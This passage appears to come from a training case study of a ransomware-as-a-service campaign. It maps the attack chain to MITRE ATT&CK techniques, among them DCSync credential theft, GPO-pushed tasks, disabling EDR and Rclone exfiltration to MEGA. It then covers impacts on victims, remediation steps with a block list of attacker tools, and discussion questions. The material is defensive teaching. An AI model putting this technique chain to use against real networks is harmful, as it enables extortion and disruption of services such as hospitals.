Discovery            | T1087.002    | Account Discovery: Domain Account                            | SharpHound/BloodHound collection
Execution            | T1569.002    | System Services: Service Execution                           | PsExec deployment to servers
Execution            | T1053.005    | Scheduled Task/Job: Scheduled Task                           | GPO-pushed scheduled task running sysupdate.exe
Defense Evasion      | T1484.001    | Domain Policy Modification: Group Policy Modification        | Malicious GPO "Security Compliance Update"
Defense Evasion      | T1562.001    | Impair Defenses: Disable or Modify Tools                     | AV/EDR termination on endpoints
Defense Evasion      | T1027.002    | Obfuscated Files or Information: Software Packing            | Custom-packed ransomware binary
Credential Access    | T1003.006    | OS Credential Dumping: DCSync                                | Domain Admin credential theft
Exfiltration         | T1567.002    | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Rclone to MEGA cloud storage
Impact               | T1486        | Data Encrypted for Impact                                    | Ransomware deployment
Impact               | T1490        | Inhibit System Recovery                                      | Shadow copy and recovery deletion

Impact Assessment

Category      | Impact
Financial     | $12M total ransoms collected across 47 victims in 3 months
Healthcare    | 3 hospitals diverted patients; 1 patient death under investigation
Data Exposure | 1 victim's data (12,000 patient records) published on leak site
Operational   | Average 5-day recovery per victim; some exceeded 14 days
Regulatory    | HIPAA breach notification obligations for healthcare victims; SEC disclosure for public companies
Economic      | Estimated $180M total cost across all victims (recovery + downtime + legal)

Remediation & Hardening

  1. Implement access broker defense — monitor dark web markets for compromised credentials; enforce MFA on all remote access (VPN, RDP, Citrix) to invalidate stolen credentials
  2. Deploy application control — whitelist approved executables on servers and critical systems; block rclone, PsExec (unauthorized), and common attacker tools
  3. Harden Active Directory — use Group Managed Service Accounts (gMSA), implement tiered administration, monitor for DCSync and Kerberoasting attacks
  4. Implement immutable backups — air-gapped or immutable backup copies that cannot be deleted or encrypted by ransomware; test restoration regularly
  5. Deploy EDR with tamper protection — endpoint detection that resists process termination, service stop and registry modification by attackers; the net stop / reg add sequence in Step 4 only succeeds where tamper protection is off
  6. Monitor GPO changes — alert on new GPO creation, especially those containing startup scripts or scheduled tasks; require change management approval
  7. Segment critical systems — isolate healthcare/OT systems, backup infrastructure, and domain controllers from general user networks
  8. Participate in threat intelligence sharing — join sector-specific ISACs to receive and contribute RaaS IOCs for cross-victim correlation
  9. Develop ransomware-specific IR playbook — pre-authorize containment decisions, establish communication protocols, and identify cryptocurrency tracing resources
  10. Evaluate cyber insurance coverage — ensure policies cover ransomware extortion, data breach notification, and business interruption with realistic limits

Discussion Questions

  1. The RaaS model enables operators to profit without conducting intrusions, while affiliates profit without developing malware. How does this specialization change the threat landscape, and what implications does it have for law enforcement disruption strategies?

  2. DARK FOUNDRY affiliates used access brokers to purchase initial entry to victim networks. What proactive measures can organizations take to detect and invalidate credentials being sold on criminal marketplaces?

  3. Affiliate "BONE SAW" attacked three hospitals, forcing patient diversions and potentially contributing to a patient death. Should RaaS operators face criminal liability for affiliate actions? How does this compare to legitimate platform liability models?

  4. One victim refused to pay and had data published on the leak site. Another paid $890K (negotiated down from $2.1M). What factors should inform the decision to pay or refuse, and how should cyber insurance influence this calculus?

  5. The DARK FOUNDRY platform was partially disrupted by law enforcement (2 of 5 C2 servers seized). How do RaaS operators build resilience into their infrastructure, and what does this mean for sustained law enforcement operations?

  6. Cross-victim TTP correlation revealed that multiple victims shared the same attacker tools, C2 infrastructure, and operational patterns. How can defenders leverage this intelligence to detect and respond to RaaS campaigns before their organization becomes a victim?


Cross-References